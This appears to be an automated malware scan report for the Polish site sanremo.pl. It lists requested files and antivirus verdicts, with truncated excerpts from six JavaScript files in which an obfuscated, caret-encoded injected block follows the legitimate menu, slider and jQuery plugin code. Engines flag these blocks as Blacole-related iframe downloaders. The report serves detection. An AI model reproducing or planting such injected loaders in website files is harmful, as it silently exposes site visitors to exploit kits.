Request | Server response | Status |
http://www.sanremo.pl/ | 200 OK Content-Length: 9269 Content-Type: text/html | clean |
http://www.sanremo.pl/szablon/sanremo/js/jquery.js | 200 OK Content-Length: 55774 Content-Type: application/javascript | clean |
http://www.sanremo.pl/szablon/sanremo/js/scripts.js | 200 OK Content-Length: 5042 Content-Type: application/javascript | clean |
http://www.sanremo.pl/szablon/sanremo/menu.js | 200 OK Content-Length: 11240 Content-Type: application/javascript | malicious |
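Malicious code, confirmed by antivirus engines (see below). The excerpt opens with what looks like the file's ordinary menu code; the flagged part appears to be the block appended after it, whose encoded tail is identical in every flagged file listed here:
function cambiascheda(idscheda) { for (var i=0; i<4; i++){ document.getElementById('sottomenu_'+i).style.display='none'; } document.getElementById(idscheda).style.display='block'; } (function () { var id = '09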
... 3054 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod781.Trojan.8de7
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/wtyczka/jscript.js | 200 OK Content-Length: 15941 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
function flipBox(b){var a;if(document.images["b_"+b].src.indexOf("_on")==-1){a=document.images["b_"+b].src.replace("_off","_on");document.getElementById("box_"+b).style.display="none";if(document.getElementById("box_"+b+"_diff")){document.getElementById("box_"+b+"_diff").style.display="block"}document.images["b_"+b].src=a;disply="none";now=new Date();now.setTime(now.getTime()+1000*60*60*24*365);expire=(now.toGMTString());document.cookie="fusion_box_"+b+"="+escape(disply)+"; expires="+expire}else
... 3000 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod11d.Trojan.2617
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- JS/Exploit-Blacole.ht
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/wtyczka/admin-msg.js | 200 OK Content-Length: 10273 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
"use strict"; function closeDiv(){$("#close-message").fadeTo("slow",0.01,function(){$(this).slideUp("slow",function(){$(this).hide()})})}window.setTimeout("closeDiv();",2500); (function () { var id = '09881'; var pptaq09 = document.crea
... 3031 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod20d.Trojan.1f21
- Ikarus
- Trojan.JS.Script
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.D
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://ajax.googleapis.com/ajax/libs/jquery/1.6/jquery.min.js | 200 OK Content-Length: 91668 Content-Type: text/javascript | clean |
http://www.sanremo.pl/slider/slider.js | 200 OK Content-Length: 0 Content-Type: application/javascript | clean |
http://www.sanremo.pl/slider/demo.js | 200 OK Content-Length: 15048 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
$(function(){ $('#slider-one').movingBoxes({ startPanel : 2, width : 800, panelWidth : .45, buildNav : true, fixedHeight : true, navFormatter : function(){ return "●"; } }); $('#slider-two').movingBoxes({ startPanel : 2, width : 800, panelWidth : .45, buildNav : false, fixedHeight : true, }); $('#slider-three').movingBoxes({ startPanel : 1, widt
... 3279 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Ikarus
- Virus.HTML.Framer
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/fancybox-1.3.4/fancybox/jquery.mousewheel-3.0.4.pack.js | 200 OK Content-Length: 11377 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
(function(d){function g(a){var b=a||window.event,i=[].slice.call(arguments,1),c=0,h=0,e=0;a=d.event.fix(b);a.type="mousewheel";if(a.wheelDelta)c=a.wheelDelta/120;if(a.detail)c=-a.detail/3;e=c;if(b.axis!==undefined&&b.axis===b.HORIZONTAL_AXIS){e=0;h=-1*c}if(b.wheelDeltaY!==undefined)e=b.wheelDeltaY/120;if(b.wheelDeltaX!==undefined)h=-1*b.wheelDeltaX/120;i.unshift(a,c,h,e);return d.event.handle.apply(this,i)}var f=["DOMMouseScroll","mousewheel"];d.event.special.mousewheel={setup:function()
... 3039 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Ad-Aware
- JS:Trojan.Script.BGQ
- Bkav
- MW.Clod820.Trojan.0b34
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- nProtect
- JS:Trojan.Script.BGQ
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Emsisoft
- JS:Trojan.Script.BGQ (B)
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Trojan:JS/BlacoleRef.DE
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- MicroWorld-eScan
- JS:Trojan.Script.BGQ
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- F-Secure
- JS:Trojan.Script.BGQ
- VIPRE
- Trojan.JS.Redirector.mb (v)
- F-Prot
- JS/IFrame.RS.gen
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- JS:Trojan.Script.BGQ
- Commtouch
- JS/IFrame.RS.gen
- BitDefender
- JS:Trojan.Script.BGQ
|
http://www.sanremo.pl/fancybox-1.3.4/fancybox/jquery.fancybox-1.3.4.pack.js | 200 OK Content-Length: 19087 Content-Type: application/javascript | malicious |
Malicious code, confirmed by antivirus engines (see below):
;(function(b){var m,t,u,f,D,j,E,n,z,A,q=0,e={},o=[],p=0,d={},l=[],G=null,v=new Image,J=/\.(jpg|gif|png|bmp|jpeg)(.*)?$/i,W=/[^\.]\.(swf)\s*$/i,K,L=1,y=0,s="",r,i,h=false,B=b.extend(b("<div/>")[0],{prop:0}),M=b.browser.msie&&b.browser.version<7&&!window.XMLHttpRequest,N=function(){t.hide();v.onerror=v.onload=null;G&&G.abort();m.empty()},O=function(){if(false===e.onError(o,q,e)){t.hide();h=false}else{e.titleShow=false;e.width="auto";e.height="auto";m.html('<p id
... 3090 bytes are skipped ...0^61^59^a5^9e^a7^65^59^9e^a7^9d^59^62^59^62^74^46^43^b6^46^43^a2^9f^59^61^a7^9a^af^a2^a0^9a^ad^a8^ab^67^9c^a8^a8^a4^a2^9e^7e^a7^9a^9b^a5^9e^9d^62^46^43^b4^46^43^a2^9f^61^80^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^62^76^76^6e^6e^62^b4^b6^9e^a5^ac^9e^b4^8c^9e^ad^7c^a8^a8^a4^a2^9e^61^60^af^a2^ac^a2^ad^9e^9d^98^ae^aa^60^65^59^60^6e^6e^60^65^59^60^6a^60^65^59^60^68^60^62^74^46^43^46^43^9a^69^72^61^62^74^46^43^b6^46^43^b6".split(gffrpz);fxtdb="";yxde("arCode");komqtq(""+fxtdb);}
Antivirus reports:
- AntiVir
- JS/Agent.bgq.1
- Avast
- JS:Decode-BFW [Trj]
- Antiy-AVL
- Trojan/JS.Iframe
- Ikarus
- Trojan.JS.Script
- TrendMicro-HouseCall
- TROJ_GEN.F47V1116
- Comodo
- TrojWare.JS.Agent.LE
- McAfee-GW-Edition
- Heuristic.BehavesLike.JS.Suspicious.G
- Microsoft
- Exploit:JS/Blacole.NY
- Kaspersky
- Trojan-Downloader.JS.Iframe.dff
- Fortinet
- JS/Kryptik.HOL!tr
- McAfee
- JS/Exploit-Blacole.ht
- NANO-Antivirus
- Trojan.Script.Iframe.bopaxv
- AVG
- HTML/Framer
- Norman
- Blacole.WU
- GData
- Script.Packed.IFrame.G
|
http://www.sanremo.pl/wtyczka/jscripts/tiny_mce/tiny_mce.js | 200 OK Content-Length: 180300 Content-Type: application/javascript | clean |
http://www.sanremo.pl/index.html | 200 OK Content-Length: 9269 Content-Type: text/html | clean |
http://www.sanremo.pl/wydarzenia.html | 200 OK Content-Length: 7639 Content-Type: text/html | clean |
http://www.sanremo.pl/kontakt.html | 200 OK Content-Length: 8167 Content-Type: text/html | clean |